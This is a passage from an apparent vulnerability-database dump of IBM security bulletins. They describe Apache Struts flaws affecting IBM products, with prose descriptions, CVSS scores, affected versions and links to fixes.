**[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts vulnerablity", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-05-11T01:06:34", "id": "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "href": "https://www.ibm.com/support/pages/node/6565845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:01:56", "description": "## Summary\n\nIBM Sterling File Gateway has addressed multiple security vulnerabilities in Apache Struts\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling File Gateway| 2.2.0.0 - 6.0.3.2 \n \n## Remediation/Fixes\n\n** Product & Version**| **APAR**| ** Remediation & Fix** \n---|---|--- \n2.2.0.0 - 2.2.6.5_2| IT34076| Apply IBM Sterling B2B Integrator version 5.2.6.5_3, 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n6.0.0.0 - 6.0.3.2| IT34076| Apply IBM Sterling B2B Integrator version 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T15:14:01", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-07-22T15:14:01", "id": "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "href": "https://www.ibm.com/support/pages/node/6324787", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:21:52", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:21:52", "id": "20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "href": "https://www.ibm.com/support/pages/node/6356621", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-30T09:48:20", "description": "## Summary\n\nSecurity vulnerabilities have been discovered in Apache\u2019s Struts library\n\n## Vulnerability Details\n\n**CVE-ID: **CVE-2014-0112, CVE-2014-0094, & CVE-2014-0050 \n\n**DESCRIPTION: **FlashSystem 840 MTM 9840-AE1, and FlashSystem V840 MTMs 9846-AE1 and 9848-AE1 use the Apache Struts library. Struts is used only by the Service Assist GUI. \n\n_CVE-2014-0112_ (Apache Struts ParametersInterceptor code execution)\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system.\n\nCVSS v2 Base Score: **7.5** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92740> \nCVSS Vector: (AV:N/AC:L/AU:N/C:P/I:P/A:P)\n\n_CVE-2014-0094_\n\nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server.\n\nCVSS v2 Base Score: **5.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92205> \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N)\n\n_CVE-2014-0050_\n\nApache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests. By sending a specially-crafted request, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \n\nCVSS v2 Base Score: **4.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90987> \nCVSS Vector: (AV:N/AC:H/AU:N/C:P/I:P/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem 840 including machine type models (all available code levels) _ \n9840-AE1 \n \n_FlashSystem V840 including machine type models (all available code levels) _ \n9846-AE1 & 9848-AE1\n\n## Remediation/Fixes\n\n_Products_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**840 MTM: ** \n9840-AE1 \n \n**V840 MTMs:** 9846-AE1 & \n9848-AE1| _A code fix is now available, the VRMF of this code level is 1.1.2.2 (or later)_| _N/A_| _No work arounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: The IBM FlashSystem 840 and V840 product model number AE1 nodes are affected by vulnerabilities in Apache\u2019s Struts library", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2023-02-18T01:45:50", "id": "1029DD6F473AD662889F3629D432E043E9F3053CFAFEA7698ACCBEF97F9ED67E", "href": "https://www.ibm.com/support/pages/node/689945", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-12T21:35:11", "description": "## Summary\n\nSecurity vulnerabilities have been discovered in Apache\u2019s Struts library\n\n## Vulnerability Details\n\n**CVE-ID: **CVE-2014-0112, CVE-2014-0094, & CVE-2014-0050 \n\n**DESCRIPTION: **FlashSystem V840 model number -AC0, and \u2013AC1 nodes use the Apache Struts library. Struts is used only by the Service Assist GUI. \n\n_CVE-2014-0112_ (Apache Struts ParametersInterceptor code execution)\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system.\n\nCVSS v2 Base Score: **7.5** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92740> \nCVSS Vector: (AV:N/AC:L/AU:N/C:P/I:P/A:P)\n\n_CVE-2014-0094_\n\nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server.\n\nCVSS v2 Base Score: **5.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92205> \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N)\n\n_CVE-2014-0050_\n\nApache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests. By sending a specially-crafted request, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \n\nCVSS v2 Base Score: **4.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90987> \nCVSS Vector: (AV:N/AC:H/AU:N/C:P/I:P/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem V840 including machine type models (all available code levels) _ \n9846-AC0, 9848-AC0, 9846-AC1, & 9848-AC1\n\n## Remediation/Fixes\n\n_Products_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n9846-AC0, \n9846-AC1, \n9848-AC0, \n9848-AC1| _A code fix is now available, the VRMF of this code level is 7.3.0.4 (or later)_| _N/A_| _No work arounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {}, "published": "2018-06-18T00:08:33", "type": "ibm", "title": "Security Bulletin: The IBM FlashSystem V840 product model numbers AC0 and AC1 nodes are affected by vulnerabilities in Apache\u2019s Struts library", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2018-06-18T00:08:33", "id": "4C0DBF63A15F96E4F2164C15299BAC4C8BB35F5DA0A29941D47EAB5DD8E7F12A", "href": "https://www.ibm.com/support/pages/node/689947", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-12T21:35:12", "description": "## Summary\n\nSecurity vulnerabilities have been discovered in Apache\u2019s Struts library\n\n## Vulnerability Details\n\n**CVE-ID: **CVE-2014-0112, CVE-2014-0094, & CVE-2014-0050 \n\n**DESCRIPTION: **FlashSystem V840-AE1 uses the Apache Struts library. Struts is used only by the Service Assist GUI. \n\n_CVE-2014-0112_ (Apache Struts ParametersInterceptor code execution)\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system.\n\nCVSS v2 Base Score: **7.5** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92740> \nCVSS Vector: (AV:N/AC:L/AU:N/C:P/I:P/A:P)\n\n_CVE-2014-0094_\n\nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server.\n\nCVSS v2 Base Score: **5.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92205> \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N)\n\n_CVE-2014-0050_\n\nApache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests. By sending a specially-crafted request, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \n\nCVSS v2 Base Score: **4.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90987> \nCVSS Vector: (AV:N/AC:H/AU:N/C:P/I:P/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem V840 including machine type models (all available code levels) _ \n9846-AE1 & 9848-AE1\n\n## Remediation/Fixes\n\n_Products_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n9846-AE1, \n9848-AE1,| _A code fix is now available, the VRMF of this code level is 1.1.2.2_| _N/A_| _No work arounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {}, "published": "2018-06-18T00:08:27", "type": "ibm", "title": "Security Bulletin: The IBM V840 product model number AE1 node is affected by vulnerabilities in Apache\u2019s Struts library", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2018-06-18T00:08:27", "id": "5286AF354DA84BB562B116A3416B9C765F3ED708765C101691CABFF974122A28", "href": "https://www.ibm.com/support/pages/node/689885", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:53:37", "description": "## Summary\n\nStruts vulnerabilities affect IBM InfoSphere Information Server. IBM InfoSphere Information Server has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-4430_](<https://vulners.com/cve/CVE-2016-4430>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed expression to bypass token validation. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114185_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114185>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-4431_](<https://vulners.com/cve/CVE-2016-4431>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the default action method. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass internal security mechanism and redirect the victim to an arbitrary site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114187_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114187>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4433_](<https://vulners.com/cve/CVE-2016-4433>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the Getter as action method. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass internal security mechanism and redirect the victim to an arbitrary site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114186_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114186>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4436_](<https://vulners.com/cve/CVE-2016-4436>) \n**DESCRIPTION:** An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114183_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4438_](<https://vulners.com/cve/CVE-2016-4438>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system. By passing a malicious expression when using the REST Plugin, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114184_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114184>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [_CVE-2016-4465_](<https://vulners.com/cve/CVE-2016-4465>) \n**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by an error when using a built-in URLValidator. An attacker could exploit this vulnerability to overload the server process. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114188_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114188>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [_CVE-2016-0785_](<https://vulners.com/cve/CVE-2016-0785>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double OGNL evaluation of attribute values. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111513_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111513>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n \n \n**CVEID:** [_CVE-2016-2162_](<https://vulners.com/cve/CVE-2016-2162>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the I18NInterceptor. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111515_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111515>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-4003_](<https://vulners.com/cve/CVE-2016-4003>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111514_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-3081_](<https://vulners.com/cve/CVE-2016-3081>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 5.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112528_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID:** [_CVE-2016-3082_](<https://vulners.com/cve/CVE-2016-3082>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112527_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID:** [_CVE-2016-3087_](<https://vulners.com/cve/CVE-2016-3087>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability using the REST Plugin to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113685_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113685>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-3093_](<https://vulners.com/cve/CVE-2016-3093>) \n**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**CVEID:** 